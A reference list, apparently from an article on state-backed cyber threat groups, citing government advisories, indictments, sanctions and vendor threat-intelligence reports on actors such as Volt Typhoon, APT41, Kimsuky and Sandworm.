- ENISA Threat Landscape 2025 —
enisa.europa.eu - CISA/NSA/FBI Joint Advisory: Volt Typhoon Pre-Positioning in U.S. Critical Infrastructure
- CISA/ASD Joint Advisory: APT40 Rapid Vulnerability Exploitation
- U.S. DOJ Indictments: APT41 (September 2020), APT40/Hainan (July 2021), Andariel (July 2025)
- U.S. Treasury OFAC Sanctions: Kimsuky (May 2023), Andariel (July 2025)
- Microsoft Threat Intelligence: Midnight Blizzard (APT29) GRAPELOADER Campaign, April 2025
- Microsoft Threat Intelligence: Seashell Blizzard / Sandworm DynoWiper, December 2025
- Mandiant / Google Cloud Threat Intelligence: APT41 Q1 2025 Surge Analysis
- Palo Alto Unit 42: APT34 Veaty and Spearal Backdoor Technical Analysis
- ESET Research: Turla Kazuar v2 and Gamaredon Collaboration Assessment
- CrowdStrike 2026 Global Threat Report — adversary breakout time metrics
- FBI Public Service Announcement: Kimsuky QR Code Phishing Campaigns, January 2026
- Chainalysis Crypto Crime Report 2025 — North Korea cryptocurrency theft figures
- Poland CERT: DynoWiper Incident Response Report, December 2025
- Check Point Research: MuddyWater Operation Olalampo and Phoenix Backdoor Analysis
- MITRE ATT&CK Framework —
attack.mitre.org